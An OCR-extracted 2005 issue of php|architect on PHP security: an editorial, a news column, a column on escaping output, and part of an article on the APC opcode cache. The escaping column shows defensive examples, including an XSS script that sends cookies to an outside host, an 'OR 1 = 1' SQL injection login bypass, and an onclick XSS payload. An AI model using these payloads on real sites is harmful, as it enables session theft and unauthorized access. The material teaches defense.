TM
VOLUME 4 ISSUE 10
www.phparchitect.com
FOCUS ON
SECURITY
PROTECT YOUR WORK FROM
SQL INJECTION ATTACKS
Ilia Alshanetsky explains
with this exerpt from
php|architect’s Guide to PHP Security
ESCAPE OUTPUT
Handling External Data
Is your work vulnerable to
HTTP RESPONSE SPLITTING?
THE CREATOR OF PHP
RASMUS LERDORF
ON
OPTIMIZATION WITH
THE ALTERNATIVE
PHP CACHE
NEXCESS.NET Internet Solutions
304 1/2 S. State St.
Ann Arbor, MI 48104-2445
h t t p : / / n e x c e s s . n e t
PHP / MySQL
SPECIALISTS!
Simple, Affordable, Reliable PHP / MySQL Web Hosting Solutions
POPULAR SHARED HOSTING PACKAGES
MINI-ME
$
6
95
POPULAR RESELLER HOSTING PACKAGES
500 MB Storage
15 GB Transfer
50 E-Mail Accounts
25 Subdomains
25 MySQL Databases
PHP5 / MySQL 4.1.X
SITEWORX control panel
/mo
SMALL BIZ
$
21
95
2000 MB Storage
50 GB Transfer
200 E-Mail Accounts
75 Subdomains
75 MySQL Databases
PHP5 / MySQL 4.1.X
SITEWORX control panel
/mo
N
EX
R
ESELL
1
$
16
95
900 MB Storage
30 GB Transfer
Unlimited MySQL Databases
Host 30 Domains
PHP5 / MYSQL 4.1.X
NODEWORX Reseller Access
All of our servers run our in-house developed PHP/MySQL
server control panel: INTERWORX-CP
INTERWORX-CP features include:
- Rigorous spam / virus filtering
- Detailed website usage stats (including realtime metrics)
- Superb file management; WYSIWYG HTML editor
INTERWORX-CP is also available for your dedicated server. Just visit
o for more information and to place your order
.
WHY NEXCESS.NET? WE ARE PHP/MYSQL DEVELOPERS
LIKE YOU AND UNDERSTAND YOUR SUPPORT NEEDS!
ORDER TODAY AND GET 10% OFF ANY WEB HOSTING PACKAGE
VISIT HTTP://NEXCESS.NET/PHPARCH FOR DETAILS
Dedicated & Managed Dedicated server solutions also available
Serving the web since Y2K
/mo
N
EX
R
ESELL
2
$
59
95
7500 MB Storage
100 GB Transfer
Unlimited MySQL Databases
Host Unlimited Domains
PHP5 / MySQL 4.1.X
NODEWORX Reseller Access
/mo
C O N T R O L P A N E L
:
php
php
5
php
php
4
NEW! PHP 5 & MYSQL 4.1.X
PHP4 & MySQL 3.x/4.0.x options also available
We'll install any PHP extension you
need! Just ask :)
128 BIT SSL CERTIFICATES
AS
LOW AS $39.95
/ YEAR
DOMAIN NAME REGISTRATION
FROM $10.00
/ YEAR
GENEROUS AFFILIATE PROGRAM
UP TO 10 0% PAY BAC K
PER REFE RRAL
30 DAY
MONEY BACK GUARANTEE
FREE DOMAIN NAME
WITH ANY ANNUAL SIGNUP
4.1.x
3.x/4.0.x
Features
12
Optimization with APC:
An introduction to PHP’s own opcode cache
by RASMUS LERDORF
18
SQL Injection
Exerpted from php|architect’s Guide to PHP Security
by ILIA ALSHANETSKY
26
Flocking to Seagull
Increase your productivity by focusing on
application-specific code
by WILLIAM ZELLER and WERNER M. KRAUSS
36
PHP and News
Applying PHP to Publishing News
by RUBÉN MARTÍNEZ ÁVILA
TM
Columns
4
EDITORIAL
6
php|news
8
TIPS & TRICKS
Escape Output:
Treat External Data with Care
by BEN RAMSEY
44
TEST PATTERN
Can They PHP?
Will Your Candidate Perform?
by MARKUS BAKER
50
SECURITY CORNER
HTTP Response Splitting
by CHRIS SHIFLETT
54
PRODUCT REVIEW
SendStudio 2004:
Mass Emailing for the Masses
by PETER MACINTYRE
58
EXIT (0);
I would Like to
Thank the Academy...
by MARCO TABINI
THIS MONTH
Download this month’s code at:
/>Volume 4 - Issue 10
Publisher
Marco Tabini
Editor-in-Chief
Sean Coates
Editorial Team
Arbi Arzoumani
Peter MacIntyre
Eddie Peloke
Graphics & Layout
Aleksandar Ilievski
Managing Editor
Emanuela Corso
News Editor
Leslie Hill
Authors
Ilia Alshanetsky, Rubén Martínez Ávila,
Marcus Baker, Werner M. Krauß, Rasmus
Lerdorf, Peter B. MacIntyre, Ben
Ramsey, Chris Shiflett,
William Zeller
php|architect (ISSN 1709-7169) is published
twelve times a year by Marco Tabini & Associates,
Inc., P.O. Box 54526, 1771 Avenue Road, Toronto,
ON M5M 4N5, Canada.
Although all possible care has been placed in
assuring the accuracy of the contents of this
magazine, including all associated source code,
listings and figures, the publisher assumes
no responsibilities with regards of use of the
information contained herein or in all associated
material.
php|architect, php|a, the php|architect logo, Marco
Tabini & Associates, Inc. and the Mta Logo are
trademarks of Marco Tabini & Associates, Inc.
Contact Information:
General mailbox:
Editorial:
Subscriptions:
Sales & advertising:
Technical support:
Printed in Canada
Copyright
©
2003-2005
Marco Tabini & Associates, Inc.
All Rights Reserved
R
eading the Table of Contents, flipping through the pages, or simply
eyeballing the cover of this issue, you will probably notice a certain
theme: security.
As I’m sure you’ve read in Security Corner over the past issues,
the problems of poorly architected sites, security-ignorant code, and
general carelessness when it comes to externally-supplied data, are rampant in our
community. Failure to abide by a few simple rules (never trust external data; filter
input; escape output; etc.) has left much of the world wide web in a state of
epidemic. The main culprits: remote code execution, SQL Injection and Cross Site
Scripting (“XSS”).
I can almost hear some of you thinking “It can’t be THAT bad! How many times
do you have to beat this dead horse?” and I wish you were correct. The reality of the
situation is that XSS vulnerabilities (if not the other, more severe problems) can be
found on all but a few elite sites (relatively speaking, from a pool of billions of web
pages, of course).
Still don’t think it’s that bad? Then you should have been at php|works in Toronto,
last month. Rasmus (more on him below) gave a keynote talk on PHP Security, and
spent a good chunk of his time explaining the wide dispersion of XSS vulnerabilities.
To illustrate his point (perfectly, I might add), he asked his audience to shout out
the names of their favorite Canadian shopping sites, from which he chose a random
site he’d never visited. Within 90 seconds, Rasmus had effectively demonstrated an
XSS problem on the site. In fact, even the heavy-hitters are not immune: a friend
showed me a simple XSS exploit for Google, as I was writing this editorial. Google!
This is the sort of stuff that keeps me awake at night, and one of the reasons
we’re happy to bring you an issue that’s packed full of security-related content. We
have the standard Security Corner, with an explanation of HTTP Response Splitting,
and how you can avoid problems in this area. We’re also proud to be publishing
a chapter from Ilia Alshanetsky’s recently-released book, php|architect’s Guide to
PHP Security, which is even more packed full of security content. Ben continues his
mini-series on security-related tips, focusing on escaping output, with which you
can avoid the dreaded XSS problems on your sites.
Security aside (for a moment), we’re extremely excited to feature an article on
APC, the Alternative PHP Cache, written by the creator of PHP, himself, Rasmus
Lerdorf. APC has been around for a while, but Rasmus (and his Yahoo! colleagues)
have recently put a considerable amount of work into a largely-reworked major
release of this extension. There’s finally a stable opcode cache for PHP 5, and from
a source we can obviously trust, so we know it’s done right. A special “thanks” goes
out to Rasmus for writing the piece.
FOCUS ON
SECURITY
EDITORIAL
news
Volume 4 Issue 10 • php|architect •6
PHP 5.0.5 RC1
php.net announces the release of PHP 5.0.5
RC1.
“This version is a maintenance release
that contains numerous bug fixes, including
security fixes to vulnerabilities found in the
XMLRPC package. All users of PHP 5.0 are
encouraged to upgrade to this version.
Some of the changes in PHP 5.0.5
include:
• Upgraded PCRE library to version
5.0.
• Added man pages for “phpize” and
“php-config” scripts.
• Changed ming to support official
0.2a and 0.3 library versions.
• Added PHP_INT_MAX and PHP_INT_
SIZE as predefined constants.
• Fixed memory corruption in stristr().
• Many more changes included as well
as several bug fixes.
Get your hands on the latest release at
php.net
!
MySQL 5.0
Release Candidate
MySQL announces:
“I’m proud and excited to announce the
first Release Candidate of MySQL 5.0. This
milestone signals that we are nearing what
is certainly the most important release in
MySQL’s history.
MySQL 5.0 has new functionality that I
hope will be welcomed, adopted, and put to
productive use by the community of MySQL
users—you. On the commercial side, MySQL
AB is getting a lot of good vibes from new
enterprise customers who are beginning to
understand the impact MySQL can have on
their IT infrastructure and costs of running
mission-critical applications.”
Some of the new ANSI SQL features
include:
• Views (both read-only and updatable
views)
• Stored Procedures and Stored
Functions, using the SQL:2003
syntax, which is also used by IBM’s
DB2
• Triggers (row-level)
• Server-side cursors (read-only, non-
scrolling)
Get all of the latest info from
mysql.com
.
NAJAX 0.4:
PHP Ajax Framework
The NAJAX Sourceforge homepage announces
the latest release version 0.4.1.0.
Najax is a PHP-based AJAX framework that
allows you to map server side functions into
JavaScript. The NAJAX project page describes
changes in this minor feature enhancement
release as:
• Small bug-fixes in the chatAdvanced
example—the error dialog was
removed.
• najax.html.importForm (imports an
associative array to the corresponding
form elements) and najax.html.
exportForm (exports form values to
an associative array) were added.
• Support for asynchronous call
canceling was added.
Check out the latest release at
/>PHPsh 1.0.1
According to the psychogenic homepage,
PHPsh provides ”Simple, web-based shell
access to your server.”
“It can be very annoying when you are
restricted to FTP access—how can you find
out the full path to a directory, or perform
a command line SQL dump when you’re
trapped in the limited, chrooted environment
provided by an FTP server? PHPsh (PHP shell)
allows you to have shell commands run on
your behalf by any webserver which serves
PHP pages. It solves these issues and more,
allowing you to tap into the power of any
Unix (Linux, BSD, etc.) server!
PHPsh was designed to allow developers,
webmasters and sysadmins a quick and easy
remedy to those situations in which it would
be so easy to solve a problem or answer a
question with shell access but a pointy-haired
hosting company thinks shell access is only
useful for crackers... while simultaneously
allowing anyone with FTP access the right to
run arbitrary commands through CGI or PHP
(doh!).”
Download PHPsh from
cho genic.co m/en/
products/PHPsh.php.
php|architect Releases New Design Patterns Book
We’re proud to announce the release of php|architect’s Guide to PHP Design Patterns, the
latest release in our Nanobook series.
You have probably heard a lot about Design Patterns —a technique that helps you
design rock-solid solutions to practical problems that programmers everywhere encounter
in their day-to-day work. Even though there has been a lot of buzz, however, no-one has
yet come up with a comprehensive resource on design patterns for PHP developers—until
today.
Author Jason E. Sweat’s book php|architect’s Guide to PHP Design Patterns is the first,
comprehensive guide to design patterns designed specifically for the PHP developer. This
book includes coverage of 16 design patterns with a specific eye to their applications in PHP
when building complex web applications, both in PHP 4 and PHP 5 (where appropriate,
sample code for both versions of the language is provided).
For more information,
/>Volume 4 Issue 10 • php|architect •7
Looking for a new PHP Extension?
Check out some of the latest
offerings from PECL.
expect 0.1
This extension allows to interact with
processes through PTYs, using the expect
library.
runkit 0.6
Replace, rename, and remove user defined
functions and classes. Define customized
superglobal variables for general purpose
use. Execute code in restricted environment
(sandboxing).
pecl_http 0.14.1
• Building absolute URIs
• RFC compliant HTTP redirects
• RFC compliant HTTP date handling
• Parsing of HTTP headers and
messages
• Caching by “Last-Modified” and/
or ETag (with ‘on the fly’ option
for ETag generation from buffered
output)
• Support for sending data/files/
streams with (multiple) ranges
• Negotiating user preferred language/
charset
• Convenient request functionality
built upon libcurl
• PHP5 classes: HttpUtil, HttpResponse
(PHP-5.1), HttpRequest,
HttpRequestPool, HttpMessage
Xdebug 2.0.0beta4
The Xdebug extension helps you debug
your scripts by providing valuable debug
information, includin the following:
• stack and function traces in error
messages with:
• full parameter display for user
defined functions
• function name, file name and line
indications
• support for member functions
• memory allocation
• protection for infinite recursions
Xdebug also provides:
• profiling information for PHP scripts
• script execution analysis
• capabilities to debug your scripts
interactively with a debug client
Check out some of the hottest new
releases from PEAR.
Validate_BE 0.1.1
Package contains locale validation for Belgium
such as:
• Postal Code
• Bank Account Number
• Structured Bank Transfer message
(Nationnal transfer from an bank
account to another)
• VAT
• Natitonal ID
• Identity Card Number (not ready)
• SIS CARD ID (belgian “sécurité
sociale” ID)
HTML_Progress2 2.0.0
This package provides a way to add a fully
customizable loading bar into existing XHTML
documents. Your browser should be DHTML-
compatible.
Features:
• create bar (horizontal, vertical),
circle, ellipse and polygon (square,
rectangle) progress meters
• allows usage of existing external
StyleSheet and/or JavaScript
• all elements’ (progress, cells, labels)
HTML properties are customizable
• percentage/labels can be placed
around the progress meter
• compliant with CSS/XHMTL
standards
• integration with template engines is
very easy
• implements the Observer design
pattern: it is possible to add Listeners
• adds a customizable monitor pattern
to display a progress bar; end-user
can abort progress at any time
• allows many progress meters on
the same page without uses of an
iframes
• error handling system that supports
native PEAR_Error, but also PEAR_
ErrorStack, and any other system you
might want to plug-in.
• PHP 5 ready
Image_Graph 0.7.0
Image_Graph provides a set of classes
that create graphs/plots/charts based on
(numerical) data. Many different plot types
are supported: Bar, line, area, step, impulse,
scatter, radar, pie, map, candlestick, band,
box & whisker and smoothed line, area and
radar plots. Graphs are highly customizable,
making it possible to get the exact look and
feel that is required.
The output is controlled by an Image_
Canvas, which facilitates easy deliver to many
different output formats:GD (PNG, JPEG, GIF,
WBMP), PDF (using PDFLib), Scalable Vector
Graphics (SVG), and others.
Image_Graph is compatible with both
PHP 4 and PHP 5.
Image_Canvas 0.2.2
A package providing a common interface
to image drawing, making image rendering
library-independent.
Services_Yahoo 0.1.1
Services_Yahoo provides object-oriented
interfaces to the web service capabilities of
Yahoo!
HTML_AJAX 0.2.1
Provides PHP and JavaScript libraries for
performing AJAX (Communication from
JavaScript to your server without reloading
the page).
Tips & Tricks
Volume 4 Issue 10 • php|architect • 8
ESCAPE OUTPUT
TIPS & TRICKS
by BEN RAMSEY
I
n the previous three Tips & Tricks columns, I’ve
taken time to fully explain why all input should
be filtered, and I’ve offered tips on how to filter
your data so that the data you work with and
save isn’t considered tainted. However, security-
conscious programming doesn’t end with filtering data.
Sure, now the data conforms to expectations, but it
may still contain characters that have special meaning
depending on the medium in which your application
chooses to display it. That medium may be HTML, SQL,
XML, WML, etc.
Thus, we must escape output.
What is output? Output is any data that leaves your
application bound for another client or application. The
receiving client or application expects the data to be
of a specific format (HTML, SQL, etc.), and that format
may include characters or other information with special
meaning to the receiving client/application. The data
being sent, however, might—and probably does—
contain special characters that should not be interpreted
with any special meaning by the receiving client.
CODE DIRECTORY: escape
TO DISCUSS THIS ARTICLE VISIT:
/>Data may leave your application in the form of HTML
sent to a Web browser, SQL sent to a database, XML sent
to an RSS reader, WML sent to a wireless device, etc. The
possibilities are limitless. Each of these has its own set
of special characters that are interpreted differently than
the rest of the plain text received. Sometimes we want to
send these special characters so that they are interpreted
(HTML tags sent to a Web browser, for example), while
other times (in the case of input from users or some other
source), we don’t want the characters to be interpreted,
so we need to escape them.
Escaping is also sometimes referred to as encoding.
In short, it is the process of representing data in a way
that it will not be executed or interpreted. For example,
HTML will render the following text in a Web browser as
Filter Input. Escape Output. You’re hearing an awful lot of this from
me lately, and as one person noted, “It’s great that they’re rubbing
this topic in.” Indeed. This month’s Tips & Tricks wraps up the recent
focus on security with a discussion on escaping output, why it’s
important, and how to do it.
Volume 4 Issue 10 • php|architect • 9
Tips & Tricks
bold-faced text because the
<strong>
tags have special
meaning:
<strong>This is bold text.</strong>
But, suppose I want to render the tags in the browser
and avoid their interpretation. Then, I need to escape
the angle brackets, which have special meaning in HTML.
The following illustrates the escaped HTML:
<strong>This is bold text.</strong>
Why Escape?
So, you run a Web-based
forum, and you don’t
have a problem with users
entering the occasional
HTML tag. Why should you
escape your output?
Here’s why: Suppose
this forum allows users to
enter HTML tags. That’s fair
enough—you may want
to allow them to enter
bold-faced or italicized
text—but then it outputs
everything in its raw
form—everything. So, all
HTML tags get interpreted
by the web browser.
What if a user enters
the following?
<script>
location.href=’ />cookies.php?cookies=’ + document.cookie;
</script>
Any subsequent user who is logged into the
forum and visits this page will now be redirected to
/> and
any cookies set by the forum can be stolen.
Let’s look at another example. Many sites contain
login forms, which usually consist of two fields—a
username and a password. When a user enters a username
and password, the application may enter the values into
an SQL statement, as in the following:
$sql = “SELECT * FROM users
WHERE username = ‘{$_POST[‘username’]}’
AND password = ‘{$_POST[‘password’]}’”;
This statement will work just fine as long as a user
enters a proper username and password, but suppose a
user enters something like “
example’ OR 1 = 1; --
”
as the username? The value of
1
will always equal
1
, and
since the user properly closed the single quote in the
statement, the
OR
clause will be treated as part of the
SQL, and everything after the
--
will be ignored (at least
in most database engines) as a comment. Thus, the user
is able to log in without an account.
The first step to ensure situations such as these
do not occur is to filter all input to ensure that no
unexpected characters appear in the data. See the July
2005 through September 2005 issues of php|architect for
my full discussion on input filtering.
After filtering, be sure to save the raw data. Do not
escape it before storing.
If escaped before storing,
then it might be necessary
to unescape it at some
point in the future. For
example, what if the data
is escaped for HTML output
and stored to a database
table only to be retrieved
later to output in XML or
to PDF, etc.? Then, it must
be unescaped to transport
to those formats—and
possibly escaped again
to accommodate the
new output medium.
This process is bound to
introduce more bugs to
your code and could likely reduce the quality of the data.
Thus, to make the most of your data, it is best to save it
raw (after filtering) and escape only when outputting.
Escaping output is not a terribly difficult process.
At the least, it may require the addition of a few extra
lines of code, or it may require a little more attention
to detail. The important thing to keep in mind is the
format outputted and the special characters that need
to be escaped for that format. For the purposes of this
discussion, I will cover escaping for HTML and SQL, since
PHP has excellent built-in functions for handling output
to these formats.
Escaping HTML
There are three main functions in PHP for escaping
HTML:
htmlentities()
,
htmlspecialchars()
, and
strip_tags()
.
In the case of
strip_tags()
, no special characters are
actually escaped, but, instead, all HTML tags are removed.
Using this function with no extra parameters is probably
one of the safest ways to completely remove all HTML tags
from output. I have seen other user-defined functions
Data may leave
your application
in many forms.
Tips & Tricks
Volume 4 Issue 10 • php|architect • 10
that attempt to do something similar by removing all
but a set of allowed tags, but these are not without their
flaws and can potentially introduce some nasty bugs
that are too lenient when outputting data. Likewise,
strip_tags()
offers the option to allow certain tags
with the format
strip_tags($str, ‘<p> <a> <b>’);
,
but this is also too lenient: attributes are not stripped
from allowed tags, allowing
onclick
events, etc. to
persist in output. Take the following code snippet, for
example:
$str = ‘<p><b>Bold text</b>
<a href=”#” onclick=”alert(\’XSS\’);”>Link</
a>
<img src=”example.png”/></p>’;
echo strip_tags($str, ‘<p> <a> <b>’);
This code will output the following, complete with
the cross-site scripting (XSS) in the
onclick
attribute:
<p><b>Bold text</b>
<a href=”#” onclick=”alert(‘XSS’);”>Link</
a></p>
Rather than completely stripping the tags from
output, a better alternative may be to escape all the tags,
allowing them to render in the output. This is an easy
task with
htmlspecialchars()
and
htmlentities()
.
Both of these functions serve the same purpose: to
convert special characters into their equivalent HTML
entities. The main difference is that
htmlentities()
is
more exhaustive, choosing to convert all characters with
HTML character entity equivalents to their respective
HTML entities. Thus, for its exhaustive nature, I will
recommend
htmlentites()
as the better function to use
to escape HTML output. For the above
$str
example,
htmlentities()
returns the following:
<p><b>Bold text</b>
<a href="#"
onclick="alert(‘XSS’);">Link&l
t;/a>
<img src="example.png"/
></p>
In this case, however, allowing the
<b>
tags may be
preferable, and so we can allow them by first escaping the
output and then converting the selected HTML entities
back to HTML with
str_replace()
:
$str = htmlentities($str);
$str = str_replace(‘<b>’, ‘<b>’, $str);
$str = str_replace(‘</b>’, ‘</b>’, $str);
This will ensure that we send only those special
characters that we desire to have interpreted to the client.
While this is a form of unescaping, which I mentioned
earlier is not a desirable process, it is nevertheless a
good alternative to using
strip_tags()
to allow
certain tags, as it will ensure that any tags that contain
undesirable attributes are not interpreted by the client.
In addition, there is no guesswork involved here; I am
not using a regular expression that I could potentially
get wrong and, thus, introduce a hole in my application.
I will always know what a
<b>
tag looks like after the
angle brackets have been converted to their HTML entity
equivalents, so it is easy for me to find and convert the
tags back to HTML.
Escaping SQL
Similarly, PHP offers excellent built-in functions for
escaping SQL statements according to the database engine
used. For PostgreSQL, there is
pg_escape_string()
for
MySQL,
mysql_real_escape_string()
and for SQLite,
sqlite_escape_string()
. If the other native database
functions provided in PHP do not offer a similar function,
then PHP offers
addslashes()
, though I would advise
that the database’s native escape string function is
always a better alternative than
addslashes()
.
Using the SQL example from earlier, we can escape it
using
mysql_real_escape_string()
, as shown in Listing
1, where we first filter it using the
filter()
function I
gave in the August 2005 issue. Thus, if a user enters the
value “
example’ OR 1 = 1; --
” as a username, the SQL
that is executed will be:
SELECT * FROM users
WHERE username = ‘example\’ OR 1 = 1; --‘
AND password = ‘password’
The single quotation mark is escaped and no results
are returned because this user doesn’t exist—the user
can’t gain access to the application.
Some database functions, such as the unified ODBC
functions, mysqli, and PDO (in PHP 5.1), use the concept
of prepared statements to prepare and properly escape
an SQL statement. Listing 2 illustrates a prepared
statements example using PDO. The SQL statement that
is created will appear much like the one listed above,
but PDO offers added functionality through the optional
bindParam()
parameters to define the type and length
of data.
Prepared statements also exist in PEAR::DB and
other database abstraction classes, but PDO offers much
promise since it is built into the language and, thus,
much faster with less overhead.
So, if possible, use prepared statements (with PDO,
if possible). If they aren’t available, use the database’s
built-in escaping function. If that isn’t available, then
fall back on
addslashes()
as a last resort.
For future installments of Tips & Tricks, I would like to
know what tips and tricks you are using. Please send
your tip and/or trick to
, and,
if I use it, you’ll receive a free digital subscription to
php|architect.
A Security-Conscious Mindset
The key to secure programming is having a security-
conscious mindset. Filtering input and escaping output
is just part of that mindset, but it takes more thought
than simply copying code from elsewhere to introduce
security to an application. It takes careful planning and
diligent testing.
By now, I hope that you are well on your way to being
a security-conscious programmer. I have introduced some
tools and concepts to help you get started, and it is likely
that you have thought of code you’ve already written and
how to improve it using these principles.
So, have fun, good luck, and be sure to keep security
at the forefront of a project. Security is not a design
feature—it is an essential tool.
1 <?php
2
3 $clean = filter($_POST, $post_whitelist);
4
5 $username = mysql_real_escape_string($clean[‘username’]);
6 $password = mysql_real_escape_string($clean[‘password’]);
7
8 $sql = “SELECT * FROM users
9 WHERE username = ‘{$username}’
10 AND password = ‘{$password}’”;
11
12 ?>
LISTING 1
1 <?php
2
3 $clean = filter($_POST, $post_whitelist);
4
5 $db = new PDO(‘mysql:host=localhost;dbname=example’,
6 ‘dbuser’, ‘dbpass’);
7
8 $sql = ‘SELECT * FROM users
9 WHERE username = :username
10 AND password = :password’;
11
12 $stmt = $db->prepare($sql);
13 $stmt->bindParam(‘:username’, $clean[‘username’],
14 PDO_PARAM_STR, 25);
15 $stmt->bindParam(‘:password’, $clean[‘password’],
16 PDO_PARAM_STR, 16);
17 $stmt->execute();
18
19 ?>
LISTING 2
Volume 4 Issue 10 • php|architect • 11
Tips & Tricks
BEN RAMSEY
is a Technology Manager for Hands On Network
in Atlanta, Georgia. He is an author, Principal member of the PHP
Security Consortium, and Zend Certified Engineer. Ben lives just north
of Atlanta with his wife Liz and dog Ashley. You may contact him at
or read his blog at />A
n opcode cache works by intercepting the
compile and execute hooks in the Zend engine
and then storing the result of the compilation
phase in a shared memory cache.
On subsequent requests to the same file,
a check is done to see if the opcodes corresponding
to the script are in the cache. There is also a check to
determine if the file on disk has a modification time
that is newer than the timestamp on the opcodes in the
cache.
There are a number of opcode caches available for
PHP. They are sometimes referred to as compilers or
accelerators, but I find the term, opcode cache, to be
the most accurate and descriptive term for what they do.
Similar packages to APC that are available are ionCube
PHP Accelerator, eAccelerator and Zend Cache. Your choice
of cache, I will leave up to you, but at the time of this
writing only APC and Zend Cache had full PHP 5.1 support
and of those two only APC is open source and available
in PECL.
Installing APC
There are a number of things you can configure when
you build APC, but you still may be able to install it with
a simple “
pear install apc
” command (an example
install session can be seen in Listing 1).
I tend to prefer poking around in any PECL extensions
I want to use before I install them, so I install extensions
by checking them out from CVS, and compiling using the
normal
phpize
+
./configure
+
make
+
make install
method (Listing 2).
OPTIMIZATION WITH THE
ALTERNATIVE
PHP CACHE
FEATURE
PHP: 4.3+
OTHER SOFTWARE: APC
LINK: />CODE DIRECTORY: apc
TO DISCUSS THIS ARTICLE VISIT:
/>Adding an opcode cache to your PHP configuration is the
easiest way to speed up your PHP applications without
changing a single line of your code.
Common Configuration Options
The APC configuration directives that I normally place in
my
php.ini
file can be seen in Listing 3.
This setup gives me a 64M single file-backed memory-
mapped segment, geared for a server with 500 cacheable
files. I’ve turned opcode optimization off, because the
ABOUT THE AUTHOR:
RASMUS LERDORF
is known
for having gotten the PHP project
off the ground in 1995, the mod_
info Apache module and he can be
blamed for the ANSI92 SQL-defying
LIMIT clause in mSQL 1.x which
has now, at least conceptually,
crept into both MySQL and Post-
greSQL. Prior to joining Yahoo!
as an infrastructure engineer in 2002, he was at a string of
companies including Linuxcare, IBM, and Bell Canada working
on Internet technologies.
Volume 4 Issue 10 • php|architect • 12
Alternative PHP Cache
apc optimizer is quite unhappy at the moment, and a
relatively low opcode cache time-to-live (ttl) of 30
minutes with a higher user cache ttl of 2 hours.
These TTL values are only used in case we start to hit
the top of our 64 megabyte segment. If we run out of
memory space, APC scans the cache for opcode and user
cache entries that haven’t been accessed for the number
of seconds denoted in the ttl configuration directive, and
removes them. The 500 files hint is just that: a hint.
You can easily cache more files than the number you’ve
declared, but it is there to help optimize the hashing
algorithm. There is no point in having a hashtable that
contains 10,000 slots, each using a little bit of memory,
if you are never going to have more than 25 files in it. An
apc.num_files_hint
of 500 actually ends up creating a
hash table with 1000 slots. If two files hash to the same
slot the second file gets linked to the first. As entries
hash to the same slots, the longer this linked list of
entries becomes, and to fetch these entries, APC has to
walk these linked lists sequentially. Therefore having
too few hash slots is also a bad thing. The one slight
advantage of having many collisions is that APC does
some very lazy garbage collection as it walks the linked
lists, but this behavior doesn’t outweigh the drawbacks.
The
apc.mmap_file_mask
configuration parameter
is tricky—generally, you would just always use
mkstemp
mask as I have shown in Listing 3. It is file-backed,
but the file is unlinked right after the
mmap
call, which
ensures that the shared memory segment automatically
be cleaned up (removed) when the APC (or APC-hosting)
process exits. If, for some reason, you want to force a
real anonymous mmap, you can leave it empty. You can
specify
/dev/zero
to
mmap
from there, if your OS prefers
that, or if you use something like
/apc.shm.XXXXXX
it
will use
shm_open()
instead. On Linux, that path has
to be in the root directory, and you must have
shmfs
enabled (either compiled into the kernel, or loaded as
a module).
You can also prevent APC from caching certain files
by using the
apc.filters
configuration directive. You
provide either a single regular expression, or a comma-
separated list of regexes that match the full-path
filenames you want to exclude from being cached. The
main reason you might want to do this is in
a scenario where you have files that change
extremely rapidly—by this, I mean every second
or two. Another circumstance where excluding certain
files from the cache might be beneficial is when your
system consists of literally hundreds of thousands of files,
and you want to force APC to focus on the performance-
critical ones and not have the little-used files potentially
causing your cache to fill up, which slows down garbage
1 10:36pm ubuntu:~> pear install apc
2 downloading APC-3.0.6.tgz ...
3 Starting to download APC-3.0.6.tgz (73,416 bytes)
4 .................done: 73,416 bytes
5 35 source files, building
6 running: phpize
7 Configuring for:
8 PHP Api Version: 20041225
9 Zend Module Api No: 20050617
10 Zend Extension Api No: 220050617
11 Use mmap instead of shmget (usually a good idea) [yes] :
12 Use apxs to set compile flags (if using APC with Apache)?
13 [yes] :
14 building in /var/tmp/pear-build-root/APC-3.0.6
15 running: /tmp/tmppBlEkK/APC-3.0.6/configure
16 --enable-apc-mmap=yes --with-apxs
17 ...
18 Build process completed successfully
19 Installing ‘/var/tmp/pear-build-root/install-APC3.0.6//usr/
local/php5/lib/php/extensions/no-debug-non-zts-20050617/apc.so’
20 install ok: APC 3.0.6
LISTING 1
1 $ cvs -d:pserver::/repository login
2 Logging in to :pserver::2401/repository
3 CVS password: phpfi
4 $ cvs -d:pserver::/repository co \
5 pecl/apc
6 cvs checkout: Updating pecl/apc
7 U pecl/apc/.cvsignore
8 U pecl/apc/CHANGELOG
9 …
10 10:44pm ubuntu:/tmp> cd pecl/apc
11 10:44pm ubuntu:/tmp/pecl/apc> phpize
12 Configuring for:
13 PHP Api Version: 20041225
14 Zend Module Api No: 20050617
15 Zend Extension Api No: 220050617
16 $ ./configure --enable-apc-mmap \
17 --with-php-config=/usr/local/php5/bin/php-config \
18 --with-apxs
19 …
20 configure: creating ./config.status
21 config.status: creating config.h
22 10:45pm ubuntu:/tmp/pecl/apc> make
23 10:47pm ubuntu:/tmp/pecl/apc> make install
24 Installing shared extensions: /usr/local/php5/lib/php/
extensions/no-debug-non-zts-20050617/
LISTING 2
1 extension=apc.so
2 apc.enabled=1
3 apc.shm_segments=1
4 apc.optimization=0
5 apc.shm_size=64
6 apc.ttl=1800
7 apc.user_ttl=7200
8 apc.num_files_hint=500
9 apc.mmap_file_mask=/tmp/apc.XXXXXX
10 apc.enable_cli=1
LISTING 3
Volume 4 Issue 10 • php|architect • 13
Alternative PHP Cache
collection. You can also invert the meaning of the
exclusion filter by setting
apc.cache_by_default
to
0
.
In this mode, APC will only cache files that do match
the regular expressions you provide in the
apc.filters
setting.
If you are unlucky enough to be on Windows, you can
grab the latest build of APC from
Click on the PECL link that matches the PHP version you
are on (near the bottom). Configuration-wise, a Windows
setup is similar, except the mmap option doesn’t apply.
Volume 4 Issue 10 • php|architect • 14
Alternative PHP Cache
The APC Info Page
In the
pecl/apc
directory, you will find a script called
apc.php
(Figure 1). This file, when executed, gives
you a nice overview of what is in your cache, and how
much of your shared memory segment is being used. It
would probably be a good idea to put this script behind
htaccess
authentication, if you are going to put it in a
web-accessible directory, but it also has its own built-
in auth system. Read the first section of the code in
apc.php
, itself for more information.
Uniquely Identifying Files
A file, whether it is the initial script file, or an included
file, is identified by its device and inode (the file’s
unique position identifier within the filesystem), not its
filename.
This method is used, so files can be uniquely identified
in a single
stat()
call. If we were to try to differentiate
files by their filename, we would need the fully qualified
pathname and that can be extremely expensive to get,
since it would involve calling
realpath()
which, in turn,
calls
stat()
for every component of the path in order
to resolve any symbolic links that it might discover. By
using the file’s inode, we get it down to a single stat call
per file. When PHP and APC are nested within an Apache
process, there is no additional
stat()
, since Apache will
have already made this call, and APC inherits the stat
structure directly from Apache. This means that, for PHP
scripts that don’t include anything, APC eliminates all
disk-touching system calls after Apache has handed the
request over to PHP. This additional optimization makes
for speedy caching.
Updating Files on a Live Web Server
People tend to not pay enough attention to how they
update files on their web server.
This is a problem, regardless of the presence of an
opcode cache. If you fire up your favourite text editor
and edit a PHP script on your live web server, not
only is there a good chance that you will break your
actual code on the first try, but more importantly, your
editor probably does not write the file to the filesystem
atomically when you are done. That means that requests
for the file you are saving may end up getting a partially
written file. File writes tend to be pretty fast, so even
on a busy server this should only affect a few requests.
However, if you throw an opcode cache into the mix,
you could end up caching this partially written file so
all subsequent requests will get the same partial set of
opcodes from the cache.
In order to reduce the impact of this scenario, APC has
an option called
file_update_protection
. This feature
is enabled, and set to 2 seconds by default—meaning
that files that have been modified within 2 seconds of
the request will not be cached. This should prevent any
